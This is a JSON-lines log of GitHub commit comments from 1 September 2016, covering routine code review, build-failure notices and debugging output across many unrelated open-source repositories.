{"id":"4505217811","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18870870,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T21:23:44Z","updated_at":"2016-09-01T21:23:44Z","body":"@JFDaly does this look familiar?\r\n\r\nkPlayer.GetPlayerTraits()->GetWonderProductionToBuildingDiscount(eBuilding)\r\n\r\nAs quoted from one of your mods:\r\n\"Wonder Production bonuses from Beliefs, Buildings, Policies, Resources, etc. also apply 50% of their bonuses towards buildings... \"\r\n\r\nI thought it was a cool idea and feature, so I incorporated into the DLL."}},"created_at":"2016-09-01T21:23:44Z"}
{"id":"4505218036","type":"CommitCommentEvent","actor":{"login":"rboller"},"repo":{"name":"nasa-gibs/reference-layer-styles"},"payload":{"comment":{"id":18870872,"position":null,"line":null,"path":null,"commit_id":"7a2265e20adda2c478a4d3f47caf87a5469a7773","created_at":"2016-09-01T21:23:47Z","updated_at":"2016-09-01T21:23:47Z","body":"Ah, this commit was to update the maritime boundary flag to use \"1\" rather than \"'yes'\""}},"created_at":"2016-09-01T21:23:47Z"}
{"id":"4505224215","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870895,"position":107,"line":150,"path":"src/google/protobuf/compiler/objectivec/objectivec_file.cc","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:25:01Z","updated_at":"2016-09-01T21:25:01Z","body":"IsDirectDependency"}},"created_at":"2016-09-01T21:25:01Z"}
{"id":"4505237448","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18870935,"position":null,"line":null,"path":null,"commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T21:27:44Z","updated_at":"2016-09-01T21:27:44Z","body":"Thanks for looking at this @jpolitz! This was very much an in-progress snapshot of this change. The failure handling in this commit is _much_ weaker than it is in later commits, first in e9926baca90c27997f699dd5b2344efbaef832c8 and again in d62b26c32da1b0d5f7ff4e7c0c3a4fd2018779bc. "}},"created_at":"2016-09-01T21:27:44Z"}
{"id":"4505243621","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870953,"position":107,"line":150,"path":"src/google/protobuf/compiler/objectivec/objectivec_file.cc","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:29:00Z","updated_at":"2016-09-01T21:29:00Z","body":"Done"}},"created_at":"2016-09-01T21:29:00Z"}
{"id":"4505245246","type":"CommitCommentEvent","actor":{"login":"beretta42"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18870959,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T21:29:21Z","updated_at":"2016-09-01T21:29:21Z","body":"FUZIX/Kernel/include/kernel.h:651:24: fatal error: sysinfoblk.h: No such file or directory\r\n\r\n:)"}},"created_at":"2016-09-01T21:29:21Z"}
{"id":"4505256416","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18870992,"position":4,"line":54,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"085fa129c7852aa7f7bd191164d7d3ede6f014dc","created_at":"2016-09-01T21:31:28Z","updated_at":"2016-09-01T21:31:28Z","body":"Remove the `options` array too"}},"created_at":"2016-09-01T21:31:28Z"}
{"id":"4505258314","type":"CommitCommentEvent","actor":{"login":"andyn"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":18870997,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-01T21:31:53Z","updated_at":"2016-09-01T21:31:53Z","body":"This breaks flags symbols where a phonetic foreign layout is a variant of another language. For example, **sv** and **sv rus**.\r\n\r\nAlso causes #5347 to be reopened."}},"created_at":"2016-09-01T21:31:53Z"}
{"id":"4505261214","type":"CommitCommentEvent","actor":{"login":"ByrkaDenis"},"repo":{"name":"Burakovivan/OleLukoje"},"payload":{"comment":{"id":18871002,"position":null,"line":null,"path":null,"commit_id":"df113ddc9cd7215940f1e5eb641649a94d8c3903","created_at":"2016-09-01T21:32:28Z","updated_at":"2016-09-01T21:32:28Z","body":"Don`t work \"add photo\". Need some fix.\r\n"}},"created_at":"2016-09-01T21:32:28Z"}
{"id":"4505261302","type":"CommitCommentEvent","actor":{"login":"slel"},"repo":{"name":"dcjones/Gadfly.jl"},"payload":{"comment":{"id":18871003,"position":null,"line":null,"path":null,"commit_id":"f8ec68dc331b697f39afc074949a23d998c907fa","created_at":"2016-09-01T21:32:29Z","updated_at":"2016-09-01T21:32:29Z","body":"Oops... Which one sounds correct?\r\n\r\nFile an issue is extremely valuable in helping me prioritize what to work on.\r\nFiling an issue is extremely valuable in helping me prioritize what to work on.\r\n\r\nReverted to \"Filing\" in https://github.com/dcjones/Gadfly.jl/pull/820."}},"created_at":"2016-09-01T21:32:29Z"}
{"id":"4505263443","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18871012,"position":null,"line":null,"path":null,"commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T21:32:55Z","updated_at":"2016-09-01T21:32:55Z","body":"@jswrenn: is there a helper that should be added to `runtime.js` called `runPromise`, that takes a thunk and returns a promise that succeeds with `SuccessResult`s and fails with `FailureResult`s?"}},"created_at":"2016-09-01T21:32:55Z"}
{"id":"4505264628","type":"CommitCommentEvent","actor":{"login":"mattdreimer"},"repo":{"name":"mattdreimer/AutonomousGrainCart"},"payload":{"comment":{"id":18871017,"position":null,"line":null,"path":null,"commit_id":"dc24ed375fc68128687eaa9fb6f6f758a4f826e9","created_at":"2016-09-01T21:33:10Z","updated_at":"2016-09-01T21:33:10Z","body":"Check out the wiki https://github.com/mattdreimer/AutonomousGrainCart/wiki/Adding-a-new-serial-read-driver-to-ArduPilot  \r\n\r\nIf you still have questions feel free to ask after you  have read through that. It requires compiling custom version of ardupilot and make sure to change mavlink files on pixhawk and also on the ground station computer or you wont be able to read your new message"}},"created_at":"2016-09-01T21:33:10Z"}
{"id":"4505265671","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18871018,"position":5,"line":4560,"path":"src/libostree/ostree-repo.c","commit_id":"3e0126f2c98938f8fd53ba40346b95653c43e14b","created_at":"2016-09-01T21:33:23Z","updated_at":"2016-09-01T21:33:23Z","body":"This check should not be needed. If we're here, it means that the function above returned `TRUE`, and `signature` will be set."}},"created_at":"2016-09-01T21:33:23Z"}
{"id":"4505270981","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"Antergos/Cnchi"},"payload":{"comment":{"id":18871034,"position":null,"line":null,"path":null,"commit_id":"4640202ad3f537bf6c59c5040b6296fe76004473","created_at":"2016-09-01T21:34:28Z","updated_at":"2016-09-01T21:34:28Z","body":"@karasu It doesnt work yet b/c AFAICT the gnome docs are wrong and I was not supposed to replace all the periods in the schema IDs with forward slashes :unamused:  Will try again when I get off work tonight."}},"created_at":"2016-09-01T21:34:28Z"}
{"id":"4505271152","type":"CommitCommentEvent","actor":{"login":"daN4cat"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18871035,"position":17,"line":17,"path":"application/hooks/load_stats.php","commit_id":"c88de60a9f6c805332cf54fdc75177fb12908e9f","created_at":"2016-09-01T21:34:30Z","updated_at":"2016-09-01T21:34:30Z","body":"probably we should add a check that the footer is printing out $CI->lang->line('common_you_are_using_ospos')"}},"created_at":"2016-09-01T21:34:30Z"}
{"id":"4505272017","type":"CommitCommentEvent","actor":{"login":"MaffooBristol"},"repo":{"name":"socketio/socket.io"},"payload":{"comment":{"id":18871038,"position":null,"line":null,"path":null,"commit_id":"1929b787707de02c091738ce381c4cc3c21668d5","created_at":"2016-09-01T21:34:39Z","updated_at":"2016-09-01T21:34:39Z","body":"Thanks!"}},"created_at":"2016-09-01T21:34:39Z"}
{"id":"4505273508","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18871043,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T21:34:59Z","updated_at":"2016-09-01T21:34:59Z","body":"> simple message\r\nBut that message will be sent to `AvoidStruts` as inactive sub-layout. So, this won't solve the original issue(#76) but will make only make `docksStartupHook` usage cleaner(as a change notable for user)"}},"created_at":"2016-09-01T21:34:59Z"}
{"id":"4505273878","type":"CommitCommentEvent","actor":{"login":"trob"},"repo":{"name":"Fabrik/fabrik"},"payload":{"comment":{"id":18871045,"position":null,"line":null,"path":null,"commit_id":"45a373791261e0797a87f89a8355ced55625265b","created_at":"2016-09-01T21:35:05Z","updated_at":"2016-09-01T21:35:05Z","body":"I have done it in transifex, too"}},"created_at":"2016-09-01T21:35:05Z"}
{"id":"4505275345","type":"CommitCommentEvent","actor":{"login":"strk"},"repo":{"name":"CartoDB/Windshaft-cartodb"},"payload":{"comment":{"id":18871053,"position":7,"line":10,"path":"NEWS.md","commit_id":"b56d110f5094e6eb8f39dbd875a4d6cc750584b9","created_at":"2016-09-01T21:35:23Z","updated_at":"2016-09-01T21:35:23Z","body":"Not to mention the tools/ dir also contained a munin configuration,\nwith its Makefile and 'install' rule...\n"}},"created_at":"2016-09-01T21:35:23Z"}
{"id":"4505282189","type":"CommitCommentEvent","actor":{"login":"alanbuxey"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":18871073,"position":null,"line":null,"path":null,"commit_id":"47a39c1522bf8bca8f37b8826028181b25fcc17f","created_at":"2016-09-01T21:36:49Z","updated_at":"2016-09-01T21:36:49Z","body":"aye:\r\n\r\nX509_STORE_CTX_get_ex_data(x509_ctx, SSL_get_ex_data_X509_STORE_CTX_idx())\r\n\r\nwhat if theres no extended date?\r\n\r\nX509_STORE_CTX_get1_issuer(&issuer_cert, x509_ctx, cert) != 1)\r\n\r\nwhat if the issuer is borked?\r\n\r\n..but hey...  :)"}},"created_at":"2016-09-01T21:36:49Z"}
{"id":"4505283360","type":"CommitCommentEvent","actor":{"login":"vmatos"},"repo":{"name":"vmatos/catkin"},"payload":{"comment":{"id":18871079,"position":24,"line":175,"path":"cmake/templates/_setup_util.py.in","commit_id":"f525bdb6a42df3e379fe34965482cf7c4a883050","created_at":"2016-09-01T21:37:05Z","updated_at":"2016-09-01T21:37:05Z","body":" ```\r\n [ DBG ] env var name:  CMAKE_PREFIX_PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  \r\n [ DBG ] CMAKE_PREFIX_PATH= /home/hazard/ros/rosserial_ard_ws/devel:/home/hazard/ros/catkin_ws/install:/opt/ros/jade\r\n\r\n\r\n\r\n [ DBG ] env var name:  LD_LIBRARY_PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  ['lib', 'lib/x86_64-linux-gnu']\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/x86_64-linux-gnu\r\n [ DBG ] Non-existent:  /home/hazard/ros/catkin_ws/install/lib/x86_64-linux-gnu\r\n [ DBG ] Non-existent:  /opt/ros/jade/lib/x86_64-linux-gnu\r\n [ DBG ] LD_LIBRARY_PATH= /home/hazard/ros/rosserial_ard_ws/devel/lib:/home/hazard/ros/rosserial_ard_ws/devel/lib/x86_64-linux-gnu:/home/hazard/ros/catkin_ws/install/lib:/home/hazard/ros/catkin_ws/install/lib/x86_64-linux-gnu:/opt/ros/jade/lib:/opt/ros/jade/lib/x86_64-linux-gnu\r\n\r\n\r\n\r\n [ DBG ] env var name:  PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  bin\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/bin\r\n [ DBG ] PATH= /home/hazard/ros/rosserial_ard_ws/devel/bin:/home/hazard/ros/catkin_ws/install/bin:/opt/ros/jade/bin:\r\n\r\n\r\n\r\n [ DBG ] env var name:  PKG_CONFIG_PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  ['lib/pkgconfig', 'lib/x86_64-linux-gnu/pkgconfig']\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/pkgconfig\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/x86_64-linux-gnu/pkgconfig\r\n [ DBG ] Non-existent:  /home/hazard/ros/catkin_ws/install/lib/x86_64-linux-gnu/pkgconfig\r\n [ DBG ] Non-existent:  /opt/ros/jade/lib/x86_64-linux-gnu/pkgconfig\r\n [ DBG ] PKG_CONFIG_PATH= /home/hazard/ros/rosserial_ard_ws/devel/lib/pkgconfig:/home/hazard/ros/rosserial_ard_ws/devel/lib/x86_64-linux-gnu/pkgconfig:/home/hazard/ros/catkin_ws/install/lib/pkgconfig:/home/hazard/ros/catkin_ws/install/lib/x86_64-linux-gnu/pkgconfig:/opt/ros/jade/lib/pkgconfig:/opt/ros/jade/lib/x86_64-linux-gnu/pkgconfig\r\n\r\n\r\n\r\n [ DBG ] env var name:  PYTHONPATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  lib/python2.7/dist-packages\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/python2.7/dist-packages\r\n [ DBG ] PYTHONPATH= /home/hazard/ros/rosserial_ard_ws/devel/lib/python2.7/dist-packages:/home/hazard/ros/catkin_ws/install/lib/python2.7/dist-packages:/opt/ros/jade/lib/python2.7/dist-packages\r\n```"}},"created_at":"2016-09-01T21:37:05Z"}
{"id":"4505283796","type":"CommitCommentEvent","actor":{"login":"PG2000"},"repo":{"name":"antonybudianto/angular2-starter"},"payload":{"comment":{"id":18871082,"position":8,"line":67,"path":"src/systemjs.conf.js","commit_id":"5d0f1f25dde9ebb7121d97fe28af6e3a63f1f060","created_at":"2016-09-01T21:37:11Z","updated_at":"2016-09-01T21:37:11Z","body":"is the var main part correct ? What does that do ?"}},"created_at":"2016-09-01T21:37:11Z"}
{"id":"4505286572","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18871088,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T21:37:46Z","updated_at":"2016-09-01T21:37:46Z","body":"Odd - tools/makeversion should have generated it\r\n"}},"created_at":"2016-09-01T21:37:46Z"}
{"id":"4505287107","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871090,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T21:37:53Z","updated_at":"2016-09-01T21:37:53Z","body":"iteration (kbenne) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T21:37:53Z"}
{"id":"4505287883","type":"CommitCommentEvent","actor":{"login":"djalova"},"repo":{"name":"SparkTC/stocator"},"payload":{"comment":{"id":18871093,"position":59,"line":59,"path":"src/main/java/com/ibm/stocator/fs/swift/http/SwiftConnectionManager.java","commit_id":"1d513d66f137990abcaabb404abc53dc996e8f91","created_at":"2016-09-01T21:38:02Z","updated_at":"2016-09-01T21:38:02Z","body":"Does this work? When I tried on my branch, whenever a SocketTimeoutException is thrown, it ignores the RetryHandler and just crashes."}},"created_at":"2016-09-01T21:38:02Z"}
{"id":"4505293831","type":"CommitCommentEvent","actor":{"login":"int19h"},"repo":{"name":"Microsoft/RTVS"},"payload":{"comment":{"id":18871116,"position":35,"line":112,"path":"src/R/Components/Impl/InteractiveWorkflow/Implementation/RInteractiveWorkflow.cs","commit_id":"e52124fac6645fe888e6d45d3dac98f50d8c9420","created_at":"2016-09-01T21:39:15Z","updated_at":"2016-09-01T21:39:15Z","body":"Project-less debugging in RTVS is also technically Attach to Process. But I don't think we can reliably distinguish attach from other ways to launch it when debugging has already begun. \r\n\r\nWhat we might want to do instead, is to check which engines are currently active, and whether the R engine GUID is present in the list or not. Unfortunately, this is not trivial - `DTE.Debugger` lets you enumerate current processes, but I don't know any way to get engine GUIDs for a process. And the only other option is installing a debug event listener in advance via `AdviseDebugEventCallback`, and listening for `IDebugProcessCreateEvent2` and `IDebugProcessDestroyEvent2` to keep track of what's being debugged."}},"created_at":"2016-09-01T21:39:15Z"}
{"id":"4505295366","type":"CommitCommentEvent","actor":{"login":"vmatos"},"repo":{"name":"vmatos/catkin"},"payload":{"comment":{"id":18871123,"position":23,"line":175,"path":"cmake/templates/_setup_util.py.in","commit_id":"24ceeef3715cc61f38190c81e0cf3197a88f0e7e","created_at":"2016-09-01T21:39:32Z","updated_at":"2016-09-01T21:39:32Z","body":"```\r\n [ DBG ] env var name:  CMAKE_PREFIX_PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  \r\n [ DBG ] CMAKE_PREFIX_PATH= /home/hazard/ros/rosserial_ard_ws/devel:/home/hazard/ros/catkin_ws/install:/opt/ros/jade\r\n\r\n\r\n\r\n [ DBG ] env var name:  LD_LIBRARY_PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  ['lib', 'lib/x86_64-linux-gnu']\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/x86_64-linux-gnu\r\n [ DBG ] Non-existent:  /home/hazard/ros/catkin_ws/install/lib/x86_64-linux-gnu\r\n [ DBG ] Non-existent:  /opt/ros/jade/lib/x86_64-linux-gnu\r\n [ DBG ] LD_LIBRARY_PATH= /home/hazard/ros/catkin_ws/install/lib:/opt/ros/jade/lib\r\n\r\n\r\n\r\n [ DBG ] env var name:  PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  bin\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/bin\r\n [ DBG ] PATH= /home/hazard/ros/catkin_ws/install/bin:/opt/ros/jade/bin:\r\n\r\n\r\n\r\n [ DBG ] env var name:  PKG_CONFIG_PATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  ['lib/pkgconfig', 'lib/x86_64-linux-gnu/pkgconfig']\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/pkgconfig\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/x86_64-linux-gnu/pkgconfig\r\n [ DBG ] Non-existent:  /home/hazard/ros/catkin_ws/install/lib/x86_64-linux-gnu/pkgconfig\r\n [ DBG ] Non-existent:  /opt/ros/jade/lib/x86_64-linux-gnu/pkgconfig\r\n [ DBG ] PKG_CONFIG_PATH= /home/hazard/ros/catkin_ws/install/lib/pkgconfig:/opt/ros/jade/lib/pkgconfig\r\n\r\n\r\n\r\n [ DBG ] env var name:  PYTHONPATH\r\n [ DBG ] paths:  ['/home/hazard/ros/rosserial_ard_ws/devel', '/home/hazard/ros/catkin_ws/install', '/opt/ros/jade']\r\n [ DBG ] subfolders:  lib/python2.7/dist-packages\r\n [ DBG ] Non-existent:  /home/hazard/ros/rosserial_ard_ws/devel/lib/python2.7/dist-packages\r\n [ DBG ] PYTHONPATH= /home/hazard/ros/catkin_ws/install/lib/python2.7/dist-packages:/opt/ros/jade/lib/python2.7/dist-packages\r\n```"}},"created_at":"2016-09-01T21:39:32Z"}
{"id":"4505297119","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871128,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T21:39:55Z","updated_at":"2016-09-01T21:39:55Z","body":"iteration (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T21:39:55Z"}
{"id":"4505298957","type":"CommitCommentEvent","actor":{"login":"mtwebster"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":18871136,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-01T21:40:18Z","updated_at":"2016-09-01T21:40:18Z","body":"Without this, I get no US flag (just 'en' fallback) and it chooses the Argentinian flag for Arabic.  I'll see if we can come up with a better solution - libgnome-kbd is clearly buggy, maybe we can work around it - sorry about this."}},"created_at":"2016-09-01T21:40:18Z"}
{"id":"4505302098","type":"CommitCommentEvent","actor":{"login":"beretta42"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18871148,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T21:40:57Z","updated_at":"2016-09-01T21:40:57Z","body":"no such file: tools/makeversion... there still exists a /Kernel/makeversion."}},"created_at":"2016-09-01T21:40:57Z"}
{"id":"4505305715","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18871152,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T21:41:41Z","updated_at":"2016-09-01T21:41:41Z","body":"طيب , انا ممكن اعمل في دالة الاضافة انو لو كان المنتج موجود يضيفو و لكن يرجع فولز \r\nو عند الاسيرشن بستخدم اسسيرت نت سيم, و بفحص عمليتين الاضافة مع بعض, و لو طلع بالاسيرت صح معناتو بكون الاختبار نجح "}},"created_at":"2016-09-01T21:41:41Z"}
{"id":"4505307242","type":"CommitCommentEvent","actor":{"login":"jesusbagpuss"},"repo":{"name":"eprintsug/altmetric"},"payload":{"comment":{"id":18871156,"position":19,"line":78,"path":"lib/static/javascript/auto/99_altmetric.js","commit_id":"f60864720bbacbc7daf05b5dc45d088accc54087","created_at":"2016-09-01T21:42:00Z","updated_at":"2016-09-01T21:42:00Z","body":"Fixes #1 "}},"created_at":"2016-09-01T21:42:00Z"}
{"id":"4505312124","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18871165,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T21:43:03Z","updated_at":"2016-09-01T21:43:03Z","body":"زي هيك \r\n`$this->assertSame($cart->AddToCart($product1,2),$cart->AddToCart($product1,3));`"}},"created_at":"2016-09-01T21:43:03Z"}
{"id":"4505312574","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18871168,"position":null,"line":null,"path":null,"commit_id":"a3ba81ea73ed94085eeccc6e7ee4a8f108928865","created_at":"2016-09-01T21:43:10Z","updated_at":"2016-09-01T21:43:10Z","body":"The following doc(s) have been deployed to the [1849logs](https://1849logs-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/debug-log-files](https://1849logs-static-docs.pantheonsite.io/docs/debug-log-files)\n- [docs/guides/load-testing-with-blazemeter](https://1849logs-static-docs.pantheonsite.io/docs/guides/load-testing-with-blazemeter)\n- [docs/logs](https://1849logs-static-docs.pantheonsite.io/docs/logs)\n- [docs/php-errors](https://1849logs-static-docs.pantheonsite.io/docs/php-errors)\n- [docs/php-versions](https://1849logs-static-docs.pantheonsite.io/docs/php-versions)\n- [docs/debug-slow-performance](https://1849logs-static-docs.pantheonsite.io/docs/debug-slow-performance)\n- [docs/nginx-access-log](https://1849logs-static-docs.pantheonsite.io/docs/nginx-access-log)\n- [docs/guides/terminus](https://1849logs-static-docs.pantheonsite.io/docs/guides/terminus)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/a3ba81ea73ed94085eeccc6e7ee4a8f108928865/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-01T21:43:10Z"}
{"id":"4505313712","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18871170,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T21:43:23Z","updated_at":"2016-09-01T21:43:23Z","body":"Makefile fixed I hope\r\n"}},"created_at":"2016-09-01T21:43:23Z"}
{"id":"4505314277","type":"CommitCommentEvent","actor":{"login":"AnatoliyMovchan"},"repo":{"name":"AnatoliyMovchan/Snake"},"payload":{"comment":{"id":18871172,"position":null,"line":null,"path":null,"commit_id":"abee3fa7140d127846dbefbf21ca7a9f703e4f16","created_at":"2016-09-01T21:43:29Z","updated_at":"2016-09-01T21:43:29Z","body":"Owesome but very easy"}},"created_at":"2016-09-01T21:43:29Z"}
{"id":"4505314901","type":"CommitCommentEvent","actor":{"login":"davestephens"},"repo":{"name":"NuSkooler/enigma-bbs"},"payload":{"comment":{"id":18871176,"position":null,"line":null,"path":null,"commit_id":"e7ba6c406eaeffe75be1f6a8ff2b5f9e4fbd3cae","created_at":"2016-09-01T21:43:37Z","updated_at":"2016-09-01T21:43:37Z","body":"Bad times, farmhash doesn't seem to want to compile on the RPi :-("}},"created_at":"2016-09-01T21:43:37Z"}
{"id":"4505315883","type":"CommitCommentEvent","actor":{"login":"ingeborgvdw"},"repo":{"name":"adereth/dactyl-keyboard"},"payload":{"comment":{"id":18871182,"position":null,"line":null,"path":null,"commit_id":"b0d4cbc104d9b3537c96ef8d75881af2ae3dc56b","created_at":"2016-09-01T21:43:49Z","updated_at":"2016-09-01T21:43:49Z","body":"Any  chance the dactyl key board  will be sold as  finished product?"}},"created_at":"2016-09-01T21:43:49Z"}
{"id":"4505316289","type":"CommitCommentEvent","actor":{"login":"ingeborgvdw"},"repo":{"name":"adereth/dactyl-keyboard"},"payload":{"comment":{"id":18871183,"position":null,"line":null,"path":null,"commit_id":"b0d4cbc104d9b3537c96ef8d75881af2ae3dc56b","created_at":"2016-09-01T21:43:54Z","updated_at":"2016-09-01T21:43:54Z","body":"I"}},"created_at":"2016-09-01T21:43:54Z"}
{"id":"4505320121","type":"CommitCommentEvent","actor":{"login":"noredlace"},"repo":{"name":"noredlace/CodeEval"},"payload":{"comment":{"id":18871193,"position":null,"line":null,"path":null,"commit_id":"6a16d436b76859b2072dd521177310d45f9eba55","created_at":"2016-09-01T21:44:44Z","updated_at":"2016-09-01T21:44:44Z","body":"Added description to top"}},"created_at":"2016-09-01T21:44:44Z"}
{"id":"4505320649","type":"CommitCommentEvent","actor":{"login":"noredlace"},"repo":{"name":"noredlace/CodeEval"},"payload":{"comment":{"id":18871194,"position":null,"line":null,"path":null,"commit_id":"215588184753f69b04e6d7cd8308165f928ae6df","created_at":"2016-09-01T21:44:51Z","updated_at":"2016-09-01T21:44:51Z","body":"Added description to top"}},"created_at":"2016-09-01T21:44:51Z"}
